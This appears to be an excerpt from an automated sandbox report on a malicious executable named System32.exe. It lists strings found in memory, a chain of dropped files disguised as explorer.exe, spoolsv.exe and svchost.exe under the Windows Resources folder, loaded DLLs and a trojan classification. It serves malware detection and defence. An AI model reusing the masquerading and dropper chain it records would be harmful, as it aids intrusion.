                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LR
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/pK
                          Source: system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/x
                          Source: system32.exe , 00000002.00000000.2156076125.00000000009C2000.00000002.00000001.01000000.00000007.sdmp, System32.exe, system32.exe .0.drString found in binary or memory: https://api.ip.sb/ip
                          Source: explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comC

                          System Summary

                          barindex
                          PE file contains section with special chars
                          Source: System32.exeStatic PE information: section name:
                          Source: System32.exeStatic PE information: section name:
                          Source: System32.exeStatic PE information: section name:
                          Source: icsys.icn.exe.0.drStatic PE information: section name:
                          Source: icsys.icn.exe.0.drStatic PE information: section name:
                          Source: icsys.icn.exe.0.drStatic PE information: section name:
                          Source: explorer.exe.3.drStatic PE information: section name:
                          Source: explorer.exe.3.drStatic PE information: section name:
                          Source: explorer.exe.3.drStatic PE information: section name:
                          Source: spoolsv.exe.5.drStatic PE information: section name:
                          Source: spoolsv.exe.5.drStatic PE information: section name:
                          Source: spoolsv.exe.5.drStatic PE information: section name:
                          Source: svchost.exe.6.drStatic PE information: section name:
                          Source: svchost.exe.6.drStatic PE information: section name:
                          Source: svchost.exe.6.drStatic PE information: section name:
                          Source: C:\Users\user\Desktop\System32.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\Themes\tjcm.cmnJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile deleted: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Code function: 2_2_0519DC742_2_0519DC74
                          Source: System32.exe, 00000000.00000000.2129609161.0000000000420000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe vs System32.exe
                          Source: System32.exe, 00000000.00000003.2278994919.000000000120A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSteanings.exe8 vs System32.exe
                          Source: System32.exe, 00000000.00000002.2286999463.000000000041D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs System32.exe
                          Source: System32.exe, 00000000.00000002.2289414921.0000000001219000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSteanings.exe8 vs System32.exe
                          Source: System32.exe, 00000000.00000003.2286187483.0000000001218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSteanings.exe8 vs System32.exe
                          Source: System32.exeBinary or memory string: OriginalFilenameTJprojMain.exe vs System32.exe
                          Source: System32.exeBinary or memory string: OriginalFilenameSteanings.exe8 vs System32.exe
                          Source: System32.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: System32.exe, 00000000.00000003.2142890719.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, System32.exe, 00000000.00000002.2286896505.0000000000401000.00000040.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000003.00000002.2372041584.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, icsys.icn.exe, 00000003.00000003.2273075923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2298339937.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3375931063.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, spoolsv.exe, 00000006.00000002.2370477599.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000006.00000003.2324309344.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2343834578.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000008.00000002.2372208986.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000008.00000003.2361376513.00000000011B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                          Source: explorer.exe, 00000005.00000002.3376042005.000000000041B000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: lH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp (m
                          Source: System32.exe, 00000000.00000002.2286955037.000000000041B000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000003.00000002.2372089103.000000000041B000.00000004.00000001.01000000.0000000A.sdmp, spoolsv.exe, 00000006.00000002.2371141415.000000000041B000.00000004.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000008.00000002.2372277161.000000000041B000.00000004.00000001.01000000.0000000C.sdmp, explorer.exe, 0000000E.00000002.2484591801.000000000041B000.00000004.00000001.01000000.0000000B.sdmp, svchost.exe, 00000011.00000002.2567304782.000000000041B000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: (mlH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp (mP
                          Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@21/13@3/2
                          Source: C:\Users\user\Desktop\System32.exeFile created: c:\users\user\desktop\system32.exe Jump to behavior
                          Source: C:\Windows\Resources\svchost.exeMutant created: NULL
                          Source: C:\Users\user\Desktop\System32.exeFile created: C:\Users\user\AppData\Local\Temp\~DFFF7356C5D947597E.TMPJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                          Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                          Source: System32.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Users\user\Desktop\System32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: System32.exeVirustotal: Detection: 84%
                          Source: System32.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\System32.exeFile read: C:\Users\user\Desktop\System32.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\System32.exe "C:\Users\user\Desktop\System32.exe"
                          Source: C:\Users\user\Desktop\System32.exeProcess created: C:\Users\user\Desktop\system32.exe c:\users\user\desktop\system32.exe
                          Source: C:\Users\user\Desktop\System32.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
                          Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                          Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                          Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                          Source: unknownProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6016 322 0000022C4F0331F0
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                          Source: C:\Users\user\Desktop\System32.exeProcess created: C:\Users\user\Desktop\system32.exe c:\users\user\desktop\system32.exe Jump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exeJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SEJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exeJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PRJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" ROJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6016 322 0000022C4F0331F0Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" ROJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Section loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
